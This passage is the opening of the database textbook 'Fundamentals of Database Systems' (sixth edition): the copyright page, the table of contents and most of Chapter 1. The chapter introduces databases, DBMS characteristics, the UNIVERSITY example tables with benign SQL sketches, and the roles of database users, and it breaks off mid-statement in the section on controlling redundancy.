
Fundamentals of Database Systems
Ramez Elmasri and Shamkant Navathe

Sixth Edition

Pearson Education Limited
Edinburgh Gate
Harlow
Essex CM20 2JE
England and Associated Companies throughout the world

Visit us on the World Wide Web at: www.pearsoned.co.uk

© Pearson Education Limited 2014

All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted
in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without either the
prior written permission of the publisher or a licence permitting restricted copying in the United Kingdom
issued by the Copyright Licensing Agency Ltd, Saffron House, 6–10 Kirby Street, London EC1N 8TS.

All trademarks used herein are the property of their respective owners. The use of any trademark
in this text does not vest in the author or publisher any trademark ownership rights in such
trademarks, nor does the use of such trademarks imply any affi liation with or endorsement of this
book by such owners.

British Library Cataloguing-in-Publication Data
A catalogue record for this book is available from the British Library

Printed in the United States of America

ISBN 10: 1-292-02560-3
ISBN 13: 978-1-292-02560-5


Table of Contents

Pearson Custom Library
(All chapters are by Ramez Elmasri and Shamkant Navathe.)

I

1. Databases and Database Users   1
2. Database System Concepts and Architecture   27
3. The Relational Data Model and Relational Database Constraints   55
4. Basic SQL   82
5. More SQL: Complex Queries, Triggers, Views and Schema Modification   115
6. The Relational Algebra and Relational Calculus   148
7. Data Modeling Using the Entity-Relationship (ER) Model   201
8. The Enhanced Entity-Relationship (EER) Model   246
9. Relational Database Design by ER- and EER-to-Relational Mapping   287
10. Practical Database Design Methodology and Use of UML Diagrams   309
11. Object and Object-Relational Databases   357
12. XML: Extensible Markup Language   420
13. Introduction to SQL Programming Techniques   454

II

14. Web Database Programming Using PHP   490
15. Basics of Functional Dependencies and Normalization for Relational Databases   508
16. Relational Database Design Algorithms and Further Dependencies   550
17. Disk Storage, Basic File Structures, and Hashing   588
18. Indexing Structures for Files   636
19. Algorithms for Query Processing and Optimization   684
20. Physical Database Design and Tuning   733
21. Introduction to Transaction Processing Concepts and Theory   747
22. Concurrency Control Techniques   780
23. Database Recovery Techniques   810
24. Database Security   836
25. Distributed Databases   877
26. Enhanced Data Models for Advanced Applications   929
27. Introduction to Information Retrieval and Web Search   992
28. Overview of Data Warehousing and OLAP   1034
Appendix: Alternative Diagrammatic Notations for ER Models   1050
Appendix: Parameters of Disks   1054
Appendix: Overview of the QBE Language   1058

III

Index   1067


Databases and Database Users

Databases and database systems are an essential component of life in modern society: most of us
encounter several activities every day that involve some interaction with a database.
For example, if we go to the bank to deposit or withdraw funds, if we make a hotel
or airline reservation, if we access a computerized library catalog to search for a bib-
liographic item, or if we purchase something online—such as a book, toy, or com-
puter—chances are that our activities will involve someone or some computer
program accessing a database. Even purchasing items at a supermarket often auto-
matically updates the database that holds the inventory of grocery items.

These interactions are examples of what we may call traditional database applica-
tions, in which most of the information that is stored and accessed is either textual
or numeric. In the past few years, advances in technology have led to exciting new
applications of database systems. New media technology has made it possible to
store images, audio clips, and video streams digitally. These types of files are becom-
ing an important component of multimedia databases. Geographic information
systems (GIS) can store and analyze maps, weather data, and satellite images. Data
warehouses and online analytical processing (OLAP) systems are used in many
companies to extract and analyze useful business information from very large data-
bases to support decision making. Real-time and active database technology is
used to control industrial and manufacturing processes. And database search tech-
niques are being applied to the World Wide Web to improve the search for informa-
tion that is needed by users browsing the Internet.

To understand the fundamentals of database technology, however, we must start from
the basics of traditional database applications. In Section 1 we start by defining a
database, and then we explain other basic terms. In Section 2, we provide a simple
UNIVERSITY database example to illustrate our discussion. Section 3 describes some
of the main characteristics of database systems, and Sections 4 and 5 categorize the
types of personnel whose jobs involve using and interacting with database systems.
Sections 6, 7, and 8 offer a more thorough discussion of the various capabilities
provided by database systems and discuss some typical database applications.
Section 9 summarizes the chapter.

From Chapter 1 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by
Addison-Wesley. All rights reserved.

The reader who desires a quick introduction to database systems can study Sections
1 through 5, then skip or browse through Sections 6 through 8.

1 Introduction
Databases and database technology have a major impact on the growing use of
computers. It is fair to say that databases play a critical role in almost all areas where
computers are used, including business, electronic commerce, engineering, medi-
cine, genetics, law, education, and library science. The word database is so com-
monly used that we must begin by defining what a database is. Our initial definition
is quite general.

A database is a collection of related data.1 By data, we mean known facts that can be
recorded and that have implicit meaning. For example, consider the names, tele-
phone numbers, and addresses of the people you know. You may have recorded this
data in an indexed address book or you may have stored it on a hard drive, using a
personal computer and software such as Microsoft Access or Excel. This collection
of related data with an implicit meaning is a database.

The preceding definition of database is quite general; for example, we may consider
the collection of words that make up this page of text to be related data and hence to
constitute a database. However, the common use of the term database is usually
more restricted. A database has the following implicit properties:

■ A database represents some aspect of the real world, sometimes called the
miniworld or the universe of discourse (UoD). Changes to the miniworld
are reflected in the database.

■ A database is a logically coherent collection of data with some inherent
meaning. A random assortment of data cannot correctly be referred to as a
database.

■ A database is designed, built, and populated with data for a specific purpose.
It has an intended group of users and some preconceived applications in
which these users are interested.

In other words, a database has some source from which data is derived, some degree
of interaction with events in the real world, and an audience that is actively interested
in its contents. The end users of a database may perform business transactions (for
example, a customer buys a camera) or events may happen (for example, an employee
has a baby) that cause the information in the database to change. In order for a
database to be accurate and reliable at all times, it must be a true reflection of the
miniworld that it represents; therefore, changes must be reflected in the database as
soon as possible.

1We will use the word data as both singular and plural, as is common in database literature; the context
will determine whether it is singular or plural. In standard English, data is used for plural and datum for
singular.

A database can be of any size and complexity. For example, the list of names and
addresses referred to earlier may consist of only a few hundred records, each with a
simple structure. On the other hand, the computerized catalog of a large library
may contain half a million entries organized under different categories—by pri-
mary author’s last name, by subject, by book title—with each category organized
alphabetically. A database of even greater size and complexity is maintained by the
Internal Revenue Service (IRS) to monitor tax forms filed by U.S. taxpayers. If we
assume that there are 100 million taxpayers and each taxpayer files an average of five
forms with approximately 400 characters of information per form, we would have a
database of 100 × 10⁶ × 400 × 5 characters (bytes) of information. If the IRS keeps
the past three returns of each taxpayer in addition to the current return, we would
have a database of 8 × 10¹¹ bytes (800 gigabytes). This huge amount of information
must be organized and managed so that users can search for, retrieve, and update
the data as needed.

An example of a large commercial database is Amazon.com. It contains data for
over 20 million books, CDs, videos, DVDs, games, electronics, apparel, and other
items. The database occupies over 2 terabytes (a terabyte is 10¹² bytes worth of stor-
age) and is stored on 200 different computers (called servers). About 15 million vis-
itors access Amazon.com each day and use the database to make purchases. The
database is continually updated as new books and other items are added to the
inventory and stock quantities are updated as purchases are transacted. About 100
people are responsible for keeping the Amazon database up-to-date.

A database may be generated and maintained manually or it may be computerized.
For example, a library card catalog is a database that may be created and maintained
manually. A computerized database may be created and maintained either by a
group of application programs written specifically for that task or by a database
management system. We are only concerned with computerized databases in this
text.

A database management system (DBMS) is a collection of programs that enables
users to create and maintain a database. The DBMS is a general-purpose software sys-
tem that facilitates the processes of defining, constructing, manipulating, and sharing
databases among various users and applications. Defining a database involves spec-
ifying the data types, structures, and constraints of the data to be stored in the data-
base. The database definition or descriptive information is also stored by the DBMS
in the form of a database catalog or dictionary; it is called meta-data. Constructing
the database is the process of storing the data on some storage medium that is con-
trolled by the DBMS. Manipulating a database includes functions such as querying
the database to retrieve specific data, updating the database to reflect changes in the
miniworld, and generating reports from the data. Sharing a database allows multi-
ple users and programs to access the database simultaneously.

An application program accesses the database by sending queries or requests for
data to the DBMS. A query2 typically causes some data to be retrieved; a
transaction may cause some data to be read and some data to be written into the
database.

Other important functions provided by the DBMS include protecting the database
and maintaining it over a long period of time. Protection includes system protection
against hardware or software malfunction (or crashes) and security protection
against unauthorized or malicious access. A typical large database may have a life
cycle of many years, so the DBMS must be able to maintain the database system by
allowing the system to evolve as requirements change over time.

It is not absolutely necessary to use general-purpose DBMS software to implement
a computerized database. We could write our own set of programs to create and
maintain the database, in effect creating our own special-purpose DBMS software. In
either case—whether we use a general-purpose DBMS or not—we usually have to
deploy a considerable amount of complex software. In fact, most DBMSs are very
complex software systems.

To complete our initial definitions, we will call the database and DBMS software
together a database system. Figure 1 illustrates some of the concepts we have dis-
cussed so far.

2 An Example
Let us consider a simple example that most readers may be familiar with: a
UNIVERSITY database for maintaining information concerning students, courses,
and grades in a university environment. Figure 2 shows the database structure and a
few sample data for such a database. The database is organized as five files, each of
which stores data records of the same type.3 The STUDENT file stores data on each
student, the COURSE file stores data on each course, the SECTION file stores data
on each section of a course, the GRADE_REPORT file stores the grades that students
receive in the various sections they have completed, and the PREREQUISITE file
stores the prerequisites of each course.

To define this database, we must specify the structure of the records of each file by
specifying the different types of data elements to be stored in each record. In Figure 2,
each STUDENT record includes data to represent the student’s Name, Student_number,
Class (such as freshman or ‘1’, sophomore or ‘2’, and so forth), and Major (such as
mathematics or ‘MATH’ and computer science or ‘CS’); each COURSE record includes
data to represent the Course_name, Course_number, Credit_hours, and Department (the
department that offers the course); and so on. We must also specify a data type for
each data element within a record. For example, we can specify that Name of STUDENT
is a string of alphabetic characters, Student_number of STUDENT is an integer, and
Grade of GRADE_REPORT is a single character from the set {‘A’, ‘B’, ‘C’, ‘D’, ‘F’, ‘I’}.
We may also use a coding scheme to represent the values of a data item. For example,
in Figure 2 we represent the Class of a STUDENT as 1 for freshman, 2 for sophomore,
3 for junior, 4 for senior, and 5 for graduate student.

2The term query, originally meaning a question or an inquiry, is loosely used for all types of interactions
with databases, including modifying the data.
3We use the term file informally here. At a conceptual level, a file is a collection of records that may or
may not be ordered.

[Figure 1: A simplified database system environment. Users/programmers submit
application programs and queries to the DBMS software, which consists of software to
process queries/programs and software to access stored data; the DBMS in turn uses the
stored database definition (meta-data) and the stored database.]
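
To make the notion of record structures and data types concrete, here is a minimal
sketch of how two of the files of Figure 2 might be declared in SQL (SQL itself is
introduced in later chapters). The column sizes and the CHECK constraint are
illustrative assumptions rather than values taken from the figure.

CREATE TABLE STUDENT (
    Name             VARCHAR(30),
    Student_number   INTEGER,
    Class            INTEGER,     -- coded value: 1 = freshman, ..., 5 = graduate student
    Major            VARCHAR(4)   -- coded value, e.g. 'CS' or 'MATH'
);

CREATE TABLE GRADE_REPORT (
    Student_number       INTEGER,
    Section_identifier   INTEGER,
    Grade                CHAR(1) CHECK (Grade IN ('A', 'B', 'C', 'D', 'F', 'I'))
);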

To construct the UNIVERSITY database, we store data to represent each student,
course, section, grade report, and prerequisite as a record in the appropriate file.
Notice that records in the various files may be related. For example, the record for
Smith in the STUDENT file is related to two records in the GRADE_REPORT file that
specify Smith’s grades in two sections. Similarly, each record in the PREREQUISITE
file relates two course records: one representing the course and the other represent-
ing the prerequisite. Most medium-size and large databases include many types of
records and have many relationships among the records.

STUDENT
Name    Student_number   Class   Major
Smith   17               1       CS
Brown   8                2       CS

COURSE
Course_name                 Course_number   Credit_hours   Department
Intro to Computer Science   CS1310          4              CS
Data Structures             CS3320          4              CS
Discrete Mathematics        MATH2410        3              MATH
Database                    CS3380          3              CS

SECTION
Section_identifier   Course_number   Semester   Year   Instructor
85                   MATH2410        Fall       07     King
92                   CS1310          Fall       07     Anderson
102                  CS3320          Spring     08     Knuth
112                  MATH2410        Fall       08     Chang
119                  CS1310          Fall       08     Anderson
135                  CS3380          Fall       08     Stone

GRADE_REPORT
Student_number   Section_identifier   Grade
17               112                  B
17               119                  C
8                85                   A
8                92                   A
8                102                  B
8                135                  A

PREREQUISITE
Course_number   Prerequisite_number
CS3380          CS3320
CS3380          MATH2410
CS3320          CS1310

Figure 2
A database that stores student and course information.

Database manipulation involves querying and updating. Examples of queries are as
follows:

■ Retrieve the transcript—a list of all courses and grades—of ‘Smith’

■ List the names of students who took the section of the ‘Database’ course
offered in fall 2008 and their grades in that section

■ List the prerequisites of the ‘Database’ course

Examples of updates include the following:

■ Change the class of ‘Smith’ to sophomore

■ Create a new section for the ‘Database’ course for this semester

■ Enter a grade of ‘A’ for ‘Smith’ in the ‘Database’ section of last semester

These informal queries and updates must be specified precisely in the query lan-
guage of the DBMS before they can be processed.
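
As an illustration only, the first query and the first update listed above might be
expressed in SQL roughly as follows, assuming the files of Figure 2 are stored as
tables; the precise syntax is the subject of the SQL chapters.

-- Retrieve the transcript (course sections and grades) of the student named Smith
SELECT SEC.Course_number, GR.Grade, SEC.Semester, SEC.Year
FROM   STUDENT ST, GRADE_REPORT GR, SECTION SEC
WHERE  ST.Name = 'Smith'
  AND  GR.Student_number = ST.Student_number
  AND  SEC.Section_identifier = GR.Section_identifier;

-- Change the class of Smith to sophomore (coded as 2)
UPDATE STUDENT
SET    Class = 2
WHERE  Name = 'Smith';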

At this stage, it is useful to describe the database as a part of a larger undertaking
known as an information system within any organization. The Information
Technology (IT) department within a company designs and maintains an informa-
tion system consisting of various computers, storage systems, application software,
and databases. Design of a new application for an existing database or design of a
brand new database starts off with a phase called requirements specification and
analysis. These requirements are documented in detail and transformed into a
conceptual design that can be represented and manipulated using some computer-
ized tools so that it can be easily maintained, modified, and transformed into a data-
base implementation. (A model called the Entity-Relationship model is used for
this purpose.) The design is then translated to a logical design that can be expressed
in a data model implemented in a commercial DBMS. (A data model known as the
Relational Data Model, not detailed here, is currently the most popular approach
for designing and implementing databases using relational DBMSs.) The final stage
is physical design, during which further specifications are provided for storing and
accessing the database. The database design is implemented, populated with actual
data, and continuously maintained to reflect the state of the miniworld.

3 Characteristics of the Database Approach
A number of characteristics distinguish the database approach from the much older
approach of programming with files. In traditional file processing, each user
defines and implements the files needed for a specific software application as part of
programming the application. For example, one user, the grade reporting office, may
keep files on students and their grades. Programs to print a student’s transcript and
to enter new grades are implemented as part of the application. A second user, the
accounting office, may keep track of students’ fees and their payments. Although
both users are interested in data about students, each user maintains separate files—
and programs to manipulate these files—because each requires some data not
available from the other user’s files. This redundancy in defining and storing data results
in wasted storage space and in redundant efforts to maintain common up-to-date
data.

In the database approach, a single repository maintains data that is defined once
and then accessed by various users. In file systems, each application is free to name
data elements independently. In contrast, in a database, the names or labels of data
are defined once, and used repeatedly by queries, transactions, and applications.
The main characteristics of the database approach versus the file-processing
approach are the following:

■ Self-describing nature of a database system

■ Insulation between programs and data, and data abstraction

■ Support of multiple views of the data

■ Sharing of data and multiuser transaction processing

We describe each of these characteristics in a separate section. We will discuss addi-
tional characteristics of database systems in Sections 6 through 8.

3.1 Self-Describing Nature of a Database System
A fundamental characteristic of the database approach is that the database system
contains not only the database itself but also a complete definition or description of
the database structure and constraints. This definition is stored in the DBMS cata-
log, which contains information such as the structure of each file, the type and stor-
age format of each data item, and various constraints on the data. The information
stored in the catalog is called meta-data, and it describes the structure of the pri-
mary database (Figure 1).

The catalog is used by the DBMS software and also by database users who need
information about the database structure. A general-purpose DBMS software pack-
age is not written for a specific database application. Therefore, it must refer to the
catalog to know the structure of the files in a specific database, such as the type and
format of data it will access. The DBMS software must work equally well with any
number of database applications—for example, a university database, a banking
database, or a company database—as long as the database definition is stored in the
catalog.

In traditional file processing, data definition is typically part of the application pro-
grams themselves. Hence, these programs are constrained to work with only one
specific database, whose structure is declared in the application programs. For
example, an application program written in C++ may have struct or class declara-
tions, and a COBOL program has data division statements to define its files.
Whereas file-processing software can access only specific databases, DBMS software
can access diverse databases by extracting the database definitions from the catalog
and using these definitions.

For the example shown in Figure 2, the DBMS catalog will store the definitions
of all the files shown. Figure 3 shows some sample entries in a database catalog.

RELATIONS
Relation_name   No_of_columns
STUDENT         4
COURSE          4
SECTION         5
GRADE_REPORT    3
PREREQUISITE    2

COLUMNS
Column_name           Data_type        Belongs_to_relation
Name                  Character (30)   STUDENT
Student_number        Character (4)    STUDENT
Class                 Integer (1)      STUDENT
Major                 Major_type       STUDENT
Course_name           Character (10)   COURSE
Course_number         XXXXNNNN         COURSE
….                    ….               …..
Prerequisite_number   XXXXNNNN         PREREQUISITE

Figure 3
An example of a database catalog for the database in Figure 2.

Note: Major_type is defined as an enumerated type with all known majors. XXXXNNNN
is used to define a type with four alpha characters followed by four digits.

These definitions are specified by the database designer prior to creating the actual
database and are stored in the catalog. Whenever a request is made to access, say, the
Name of a STUDENT record, the DBMS software refers to the catalog to determine
the structure of the STUDENT file and the position and size of the Name data item
within a STUDENT record. By contrast, in a typical file-processing application, the
file structure and, in the extreme case, the exact location of Name within a STUDENT
record are already coded within each program that accesses this data item.
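
Many relational DBMSs make the catalog itself queryable, for example through the SQL
standard’s INFORMATION_SCHEMA views (product support varies). A hedged sketch of
asking the catalog a question similar to the COLUMNS table of Figure 3:

-- What columns and data types does the catalog record for the STUDENT table?
SELECT COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH
FROM   INFORMATION_SCHEMA.COLUMNS
WHERE  TABLE_NAME = 'STUDENT';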

3.2 Insulation between Programs and Data,
and Data Abstraction

In traditional file processing, the structure of data files is embedded in the applica-
tion programs, so any changes to the structure of a file may require changing all pro-
grams that access that file. By contrast, DBMS access programs do not require such
changes in most cases. The structure of data files is stored in the DBMS catalog sepa-
rately from the access programs. We call this property program-data independence.


For example, a file access program may be written in such a way that it can access
only STUDENT records of the structure shown in Figure 4. If we want to add another
piece of data to each STUDENT record, say the Birth_date, such a program will no
longer work and must be changed. By contrast, in a DBMS environment, we only
need to change the description of STUDENT records in the catalog (Figure 3) to
reflect the inclusion of the new data item Birth_date; no programs are changed. The
next time a DBMS program refers to the catalog, the new structure of STUDENT
records will be accessed and used.
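
In a relational DBMS, adding Birth_date is typically a single change to the stored
description rather than a change to every program; a minimal sketch, assuming the
STUDENT table sketched earlier (some systems omit the COLUMN keyword):

-- Extend the catalog description of STUDENT; programs that never mention
-- Birth_date continue to work unchanged (program-data independence)
ALTER TABLE STUDENT ADD COLUMN Birth_date DATE;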

In some types of database systems, such as object-oriented and object-relational
systems, users can define operations on data as part of the database definitions. An
operation (also called a function or method) is specified in two parts. The interface
(or signature) of an operation includes the operation name and the data types of its
arguments (or parameters). The implementation (or method) of the operation is
specified separately and can be changed without affecting the interface. User appli-
cation programs can operate on the data by invoking these operations through their
names and arguments, regardless of how the operations are implemented. This may
be termed program-operation independence.

The characteristic that allows program-data independence and program-operation
independence is called data abstraction. A DBMS provides users with a conceptual
representation of data that does not include many of the details of how the data is
stored or how the operations are implemented. Informally, a data model is a type of
data abstraction that is used to provide this conceptual representation. The data
model uses logical concepts, such as objects, their properties, and their interrela-
tionships, that may be easier for most users to understand than computer storage
concepts. Hence, the data model hides storage and implementation details that are
not of interest to most database users.

For example, reconsider Figures 2 and 3. The internal implementation of a file may
be defined by its record length—the number of characters (bytes) in each record—
and each data item may be specified by its starting byte within a record and its length
in bytes. The STUDENT record would thus be represented as shown in Figure 4. But
a typical database user is not concerned with the location of each data item within a
record or its length; rather, the user is concerned that when a reference is made to
Name of STUDENT, the correct value is returned. A conceptual representation of the
STUDENT records is shown in Figure 2. Many other details of file storage organiza-
tion—such as the access paths specified on a file—can be hidden from database
users by the DBMS.

Data Item Name    Starting Position in Record   Length in Characters (bytes)
Name              1                             30
Student_number    31                            4
Class             35                            1
Major             36                            4

Figure 4
Internal storage format for a STUDENT record, based on the database catalog in Figure 3.

In the database approach, the detailed structure and organization of each file are
stored in the catalog. Database users and application programs refer to the concep-
tual representation of the files, and the DBMS extracts the details of file storage
from the catalog when these are needed by the DBMS file access modules. Many
data models can be used to provide this data abstraction to database users.

In object-oriented and object-relational databases, the abstraction process includes
not only the data structure but also the operations on the data. These operations
provide an abstraction of miniworld activities commonly understood by the users.
For example, an operation CALCULATE_GPA can be applied to a STUDENT object to
calculate the grade point average. Such operations can be invoked by the user
queries or application programs without having to know the details of how the
operations are implemented. In that sense, an abstraction of the miniworld activity
is made available to the user as an abstract operation.

3.3 Support of Multiple Views of the Data
A database typically has many users, each of whom may require a different perspec-
tive or view of the database. A view may be a subset of the database or it may con-
tain virtual data that is derived from the database files but is not explicitly stored.
Some users may not need to be aware of whether the data they refer to is stored or
derived. A multiuser DBMS whose users have a variety of distinct applications must
provide facilities for defining multiple views. For example, one user of the database
of Figure 2 may be interested only in accessing and printing the transcript of each
student; the view for this user is shown in Figure 5(a). A second user, who is inter-
ested only in checking that students have taken all the prerequisites of each course
for which they register, may require the view shown in Figure 5(b).
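
In SQL, such a view is a named, derived table that is not stored separately; a sketch of
how the COURSE_PREREQUISITES view of Figure 5(b) could be defined over the
Figure 2 tables:

CREATE VIEW COURSE_PREREQUISITES AS
SELECT C.Course_name, C.Course_number, P.Prerequisite_number
FROM   COURSE C, PREREQUISITE P
WHERE  C.Course_number = P.Course_number;

A user who queries COURSE_PREREQUISITES need not know whether the data is
stored or derived.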

3.4 Sharing of Data and Multiuser Transaction Processing
A multiuser DBMS, as its name implies, must allow multiple users to access the data-
base at the same time. This is essential if data for multiple applications is to be inte-
grated and maintained in a single database. The DBMS must include concurrency
control software to ensure that several users trying to update the same data do so in
a controlled manner so that the result of the updates is correct. For example, when
several reservation agents try to assign a seat on an airline flight, the DBMS should
ensure that each seat can be accessed by only one agent at a time for assignment to a
passenger. These types of applications are generally called online transaction pro-
cessing (OLTP) applications. A fundamental role of multiuser DBMS software is to
ensure that concurrent transactions operate correctly and efficiently.

The concept of a transaction has become central to many database applications. A
transaction is an executing program or process that includes one or more database
accesses, such as reading or updating of database records. Each transaction is sup-
posed to execute a logically correct database access if executed in its entirety without
interference from other transactions. The DBMS must enforce several transaction
properties. The isolation property ensures that each transaction appears to execute
in isolation from other transactions, even though hundreds of transactions may be
executing concurrently. The atomicity property ensures that either all the database
operations in a transaction are executed or none are.
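
Bracketed in SQL, the airline-seat example might look like the sketch below. The SEAT
table and its columns are hypothetical (they are not part of the UNIVERSITY example);
the point is that the DBMS’s concurrency control lets only one such transaction succeed
for a given seat, and atomicity guarantees the update is applied completely or not at all.

START TRANSACTION;

-- Assign seat 22A on flight XY100 to a passenger, but only if it is still available
UPDATE SEAT
SET    Passenger_id = 1234, Status = 'RESERVED'
WHERE  Flight_number = 'XY100'
  AND  Seat_number   = '22A'
  AND  Status        = 'AVAILABLE';

COMMIT;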

The preceding characteristics are important in distinguishing a DBMS from tradi-
tional file-processing software. In Section 6 we discuss additional features that char-
acterize a DBMS. First, however, we categorize the different types of people who
work in a database system environment.

4 Actors on the Scene
For a small personal database, such as the list of addresses discussed in Section 1,
one person typically defines, constructs, and manipulates the database, and there is
no sharing. However, in large organizations, many people are involved in the design,
use, and maintenance of a large database with hundreds of users. In this section we
identify the people whose jobs involve the day-to-day use of a large database; we call
them the actors on the scene. In Section 5 we consider people who may be called
workers behind the scene—those who work to maintain the database system envi-
ronment but who are not actively interested in the database contents as part of their
daily job.

(a) TRANSCRIPT
Student_name   Course_number   Grade   Semester   Year   Section_id
Smith          CS1310          C       Fall       08     119
               MATH2410        B       Fall       08     112
Brown          MATH2410        A       Fall       07     85
               CS1310          A       Fall       07     92
               CS3320          B       Spring     08     102
               CS3380          A       Fall       08     135

(b) COURSE_PREREQUISITES
Course_name       Course_number   Prerequisites
Database          CS3380          CS3320, MATH2410
Data Structures   CS3320          CS1310

Figure 5
Two views derived from the database in Figure 2. (a) The TRANSCRIPT view.
(b) The COURSE_PREREQUISITES view.

4.1 Database Administrators
In any organization where many people use the same resources, there is a need for a
chief administrator to oversee and manage these resources. In a database environ-
ment, the primary resource is the database itself, and the secondary resource is the
DBMS and related software. Administering these resources is the responsibility of
the database administrator (DBA). The DBA is responsible for authorizing access
to the database, coordinating and monitoring its use, and acquiring software and
hardware resources as needed. The DBA is accountable for problems such as secu-
rity breaches and poor system response time. In large organizations, the DBA is
assisted by a staff that carries out these functions.

4.2 Database Designers
Database designers are responsible for identifying the data to be stored in the data-
base and for choosing appropriate structures to represent and store this data. These
tasks are mostly undertaken before the database is actually implemented and popu-
lated with data. It is the responsibility of database designers to communicate with
all prospective database users in order to understand their requirements and to cre-
ate a design that meets these requirements. In many cases, the designers are on the
staff of the DBA and may be assigned other staff responsibilities after the database
design is completed. Database designers typically interact with each potential group
of users and develop views of the database that meet the data and processing
requirements of these groups. Each view is then analyzed and integrated with the
views of other user groups. The final database design must be capable of supporting
the requirements of all user groups.

4.3 End Users
End users are the people whose jobs require access to the database for querying,
updating, and generating reports; the database primarily exists for their use. There
are several categories of end users:

■ Casual end users occasionally access the database, but they may need differ-
ent information each time. They use a sophisticated database query language
to specify their requests and are typically middle- or high-level managers or
other occasional browsers.

■ Naive or parametric end users make up a sizable portion of database end
users. Their main job function revolves around constantly querying and
updating the database, using standard types of queries and updates—called
canned transactions—that have been carefully programmed and tested. The
tasks that such users perform are varied:

• Bank tellers check account balances and post withdrawals and deposits.

• Reservation agents for airlines, hotels, and car rental companies check
availability for a given request and make reservations.

• Employees at receiving stations for shipping companies enter package
identifications via bar codes and descriptive information through buttons
to update a central database of received and in-transit packages.

■ Sophisticated end users include engineers, scientists, business analysts, and
others who thoroughly familiarize themselves with the facilities of the
DBMS in order to implement their own applications to meet their complex
requirements.

■ Standalone users maintain personal databases by using ready-made pro-
gram packages that provide easy-to-use menu-based or graphics-based
interfaces. An example is the user of a tax package that stores a variety of per-
sonal financial data for tax purposes.

A typical DBMS provides multiple facilities to access a database. Naive end users
need to learn very little about the facilities provided by the DBMS; they simply have
to understand the user interfaces of the standard transactions designed and imple-
mented for their use. Casual users learn only a few facilities that they may use
repeatedly. Sophisticated users try to learn most of the DBMS facilities in order to
achieve their complex requirements. Standalone users typically become very profi-
cient in using a specific software package.

4.4 System Analysts and Application Programmers
(Software Engineers)

System analysts determine the requirements of end users, especially naive and
parametric end users, and develop specifications for standard canned transactions
that meet these requirements. Application programmers implement these specifi-
cations as programs; then they test, debug, document, and maintain these canned
transactions. Such analysts and programmers—commonly referred to as software
developers or software engineers—should be familiar with the full range of
capabilities provided by the DBMS to accomplish their tasks.

5 Workers behind the Scene
In addition to those who design, use, and administer a database, others are associ-
ated with the design, development, and operation of the DBMS software and system
environment. These persons are typically not interested in the database content
itself. We call them the workers behind the scene, and they include the following cat-
egories:

■ DBMS system designers and implementers design and implement the
DBMS modules and interfaces as a software package. A DBMS is a very com-
plex software system that consists of many components, or modules, includ-
ing modules for implementing the catalog, query language processing,
interface processing, accessing and buffering data, controlling concurrency,
and handling data recovery and security. The DBMS must interface with
other system software such as the operating system and compilers for vari-
ous programming languages.


■ Tool developers design and implement tools—the software packages that
facilitate database modeling and design, database system design, and
improved performance. Tools are optional packages that are often purchased
separately. They include packages for database design, performance moni-
toring, natural language or graphical interfaces, prototyping, simulation,
and test data generation. In many cases, independent software vendors
develop and market these tools.

■ Operators and maintenance personnel (system administration personnel)
are responsible for the actual running and maintenance of the hardware and
software environment for the database system.

Although these categories of workers behind the scene are instrumental in making
the database system available to end users, they typically do not use the database
contents for their own purposes.

6 Advantages of Using the DBMS Approach
In this section we discuss some of the advantages of using a DBMS and the capabil-
ities that a good DBMS should possess. These capabilities are in addition to the four
main characteristics discussed in Section 3. The DBA must utilize these capabilities
to accomplish a variety of objectives related to the design, administration, and use
of a large multiuser database.

6.1 Controlling Redundancy
In traditional software development utilizing file processing, every user group
maintains its own files for handling its data-processing applications. For example,
consider the UNIVERSITY database example of Section 2; here, two groups of users
might be the course registration personnel and the accounting office. In the tradi-
tional approach, each group independently keeps files on students. The accounting
office keeps data on registration and related billing information, whereas the regis-
tration office keeps track of student courses and grades. Other groups may further
duplicate some or all of the same data in their own files.

This redundancy in storing the same data multiple times leads to several problems.
First, there is the need to perform a single logical update—such as entering data on
a new student—multiple times: once for each file where student data is recorded.
This leads to duplication of effort. Second, storage space is wasted when the same data
is stored repeatedly, and this problem may be serious for large databases. Third, files
that represent the same data may become inconsistent. This may happen because an
update is applied to some of the files but not to others. Even if an update—such as
adding a new student—is applied to all the appropriate files, the data concerning
the student may still be inconsistent because the updates are applied independently
by each user group. For example, one user group may enter a student’s birth date
erroneously as ‘JAN-19-1988’, whereas the other user groups may enter the correct
value of ‘JAN-29-1988’.

(a) GRADE_REPORT
Student_number   Student_name   Section_identifier   Course_number   Grade
17               Smith          112                  MATH2410        B
17               Smith          119                  CS1310          C
8                Brown          85                   MATH2410        A
8                Brown          92                   CS1310          A
8                Brown          102                  CS3320          B
8                Brown          135                  CS3380          A

(b) GRADE_REPORT
Student_number   Student_name   Section_identifier   Course_number   Grade
17               Brown          112                  MATH2410        B

Figure 6
Redundant storage of Student_name and Course_number in GRADE_REPORT.
(a) Consistent data. (b) Inconsistent record.

In the database approach, the views of different user groups are integrated during
database design. Ideally, we should have a database design that stores each logical
data item—such as a student’s name or birth date—in only one place in the database.
This is known as data normalization, and it ensures consistency and saves storage
space. However, in practice, it is sometimes necessary to use controlled redundancy
to improve the performance of queries. For example, we may store Student_name and
Course_number redundantly in a GRADE_REPORT file (Figure 6(a)) because when-
ever we retrieve a GRADE_REPORT record, we want to retrieve the student name and
course number along with the grade, student number, and section identifier. By plac-
ing all the data together, we do not have to search multiple files to collect this data.
This is known as denormalization. In such cases, the DBMS should have the capabil-
ity to control this redundancy in order to prohibit inconsistencies among the files.
This may be done by automatically checking that the Student_name–Student_number
values in any GRADE_REPORT record in Figure 6(a) match one of the
Name–Student_number values of a STUDENT record (Figure 2). Similarly, the
Section_identifier–Course_number values in GRADE_REPORT can be checked against
SECTION records. Such checks can be specified to the DBMS during database design
and automatically enforced by the DBMS whenever the GRADE_REPORT file is
updated. Figure 6(b) shows a GRADE_REPORT record that is inconsistent with the
STUDENT file in Figure 2; this kind of error may be entered if the redundancy is not
controlled. Can you tell which part is inconsistent?
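
One way to specify such a check declaratively, rather than coding it in every update
program, is a foreign key that spans the redundant columns. The sketch below assumes
the denormalized GRADE_REPORT of Figure 6(a), which carries Student_name alongside
Student_number; the constraint names are arbitrary.

-- Make the (Student_number, Name) pair in STUDENT referenceable
ALTER TABLE STUDENT
  ADD CONSTRAINT student_num_name_uq UNIQUE (Student_number, Name);

-- Reject any GRADE_REPORT record whose Student_number/Student_name pair
-- does not match a STUDENT record (as in Figure 6(b))
ALTER TABLE GRADE_REPORT
  ADD CONSTRAINT gr_student_fk
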